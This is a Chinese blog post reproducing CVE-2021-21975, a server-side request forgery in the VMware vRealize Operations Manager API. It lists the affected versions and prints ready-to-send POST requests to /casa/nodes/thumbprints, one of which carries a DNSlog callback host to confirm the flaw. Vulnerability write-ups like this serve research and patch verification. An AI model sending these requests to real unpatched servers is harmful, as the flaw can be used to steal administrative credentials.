VMware™ vRealize Operations Manager
SSRF(CVE-2021-21975)複現
一、漏洞簡介
VMware™ vRealize Operations Manager API包含伺服器端請求僞造。可以通過網絡通路VMware™ vRealize Operations Manager API的惡意攻擊者可以執行伺服器端請求僞造攻擊(SSRF),以竊取管理憑據。
二、影響版本
VMware:cloud_foundation: 4.x 3.x
VMware:vRealize_suite_lifecycle_manager: 8.x
VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0
三、漏洞複現
通路界面
POC:
POST /casa/nodes/thumbprints HTTP/1.1
Host: thelostworld:8080
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Length: 20
["thelostworld.DNS"]
詳細資料包:
POST /casa/nodes/thumbprints HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Length: 20
["kwluae.dnslog.cn"]
編寫腳本驗證:
參考:
https://mp.weixin.qq.com/s/fNpSXGvU-p3O5fZ2gTeimg
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
https://mp.weixin.qq.com/s/fAYvOdmZO-daxe5FUI8wQA
免責聲明:本站提供安全工具、程式(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱檢視更多複現文章、學習筆記
thelostworld
安全路上,與你并肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人部落格園:https://www.cnblogs.com/thelostworld/
FREEBUF首頁:https://www.freebuf.com/author/thelostworld?type=article
語雀部落格首頁:https://www.yuque.com/thelostworld
歡迎添加本公衆号作者微信交流,添加時備注一下“公衆号”